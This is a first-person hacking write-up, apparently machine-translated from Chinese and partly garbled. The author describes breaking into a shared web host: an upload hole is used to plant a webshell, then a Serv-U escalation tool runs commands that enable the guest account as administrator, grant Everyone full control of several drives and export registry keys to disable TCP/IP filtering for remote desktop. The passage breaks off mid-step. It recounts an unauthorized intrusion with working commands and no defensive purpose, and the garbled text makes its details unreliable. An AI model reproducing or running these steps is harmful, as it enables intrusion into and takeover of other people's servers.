Lvhuana 1: Get a small test from WebShell this evening, because I am too nickn, I will not, I can only do this ......... I have passed, there is no way to make up Figure, I hope to understand this little post. Today is a boring day, I am not bored at night, I have to go to a video chat site, I suddenly discovered a special fire violence of a chat room, the number of 500 people have been inside (full staff), brush N I didn't go in .......... More depressed! :( Think about it is nothing to do, test how the host is safe to do, huh, huh (too dish, saying that people safety is really raising yourself) Ping under CMD, then got the other party IP, then landed http://whois.Webhosting.info/ The other ip Take a look at the other sites, ha, this time, there are dozens of sites, it is estimated that I can still find a two-vulnerable site. Find, finally found a pages of a driving band vulnerability _Soft.asp "> http://www.xxx.net/upfile_soft.asp, upload a WebShell (Haoyang 2005 official version) first (how to upload me is not Luo Wei Upload tools are now drifting. 2: Successfully improved rights to establish users to get the WebShell, high-happily login, suddenly found any permissions, only in their own Webshell's directory (CDEF disk Can't be browsed), even if the permissions of deleting files are not, depressed ........ Back to Server〗 Look at the host to open a service, after discovering that he opened the terminal service and Serv-U service, Ha, this has a head ^ _ ^ Scan his IP with SuperScan, and then seeing the serv-u, version 5.0 he used through Banner.
To 〖wscript.shell, let's try to execute the CMD command. You can't, if you enter the net user, you don't have it, then you can perform the CMD command through wscript.shell, and then enter the NET USER. Return each other's User list, haha, this It's good, I can get it! ! Upload SERV-U lifting tool to D: / A004 / TGGTWE / ****. COM / UPLOADSOFT directory below, rename: test.exe, then return to 〖wscript.shell to execute commands, 嘿嘿, immediately Only fat chicken is going to hand, please ING ~ Erhaw command with WScript.Shell: d: / a004 / tggtwe / ****. Com / uploadsoft / test.exe "Net user guest / activ: YES" # Activation Guest Account, I like to use this account D: / A004 / TGGTWE / ****. Com / uploadsoft / test.exe "net user guest lvhuana" # Set the password of the guest account to lvhuanad: / a004 / tggtwe / ** **. com / uploadsoft / test.exe "Net localgroup administrators guest / add" # enhances guest rights to Admin rights, the account is established, perform NET localgroup administrators to see success, by echoing knowing the addition of success.
Then when you perform NetStat -an, you see the terminal port of his open is the default 3389, OK, the connection is try ~ 3: Solve the TCP / IP filter connection! ? Halo ........... I took out Superscan to sweep his 3389, couldn't sweep at all ...... (opened firewall!? Rely, my little back .. ...) There is no way, return to WScript.shell again to perform CMD command: d: / a004 / tggtwe / ****. Com / uploadsoft / test.exe "Cacls.exe C: / E / T / g Everyone : F "# Set the C disk to Everyone can browse D: / a004 / tggtwe / ****. Com / uploadsoft / test.exe" Cacls.exe D: / E / T / G Everyone: f "# put D The disc is set to Everyone can browse D: / A004 / TGGTWE / ****. Com / uploadsoft / test.exe "Cacls.exe E: / E / E:" Set the E disk to Everyone can be viewed D: / A004 / TGGTWE / ****. Com / uploadsoft / test.exe "Cacls.exe f: / e / t / g everyone: f" # Set the F disk to everyone can browse this minimum can be traversed throughout Hard drive, I have turned around in the hard disk, I haven't found his firewall file, there is a number in my heart, and it is definitely he for TCP / IP screening! (Of course, there is also the possibility of doing the server in the internal network. If you can determine from ipconfig -all) breakthrough TCP / IP filtering we can change his registry to achieve, what we have to do is to export three of his registry, After the changes are imported, return to 〖wscript.shell to perform the cmd command: D: / a004 / tggtwe / ****. Com / uploadsoft / test.exe "regedit-E d: / A004 / TggTWE / * ***. com / uploadsoft / 1.REG HKEY_LOCAL_MACHINE / SYSTEM / Controlset001 / Services / TCPIP "# 导出: 册 表 关于 表 关于 表 第一 表 第一 表 第一 表 第一 表 第一: 第一: d / Test.exe "regedit-E d: / a004 / tggtwe / ****. com / uploadsoft / 2.reg hkey_local_machine / system / controlset002 / service / tcpip" 导 导 导 册 表 表 表 表 表 表 表 表D: / A004 / TGGTWE / ****. Com / uploadsoft / test.exe "regedit -e d: / a004 / tggtwe / ****. Com / uploadsoft / 3.reg hkey_local_machine / system / currentControlset / Services / TCPIP "# Export the third place about TCP / IP filtering in the registration table and then return to 〖stream〗 or 〖FSO〗 Discovery 1.reg, 2.reg, 3.Reg is quiet lying there, 嘿嘿 ~ 1. REG, 2.REG, 3.REG Download Back to your hard drive, change the TCP / IP screening, first open 1.Reg to find "EnableSecurityFilters" = DWORD: 00000001 Put the back Number 1 is changed to 0 after saving,
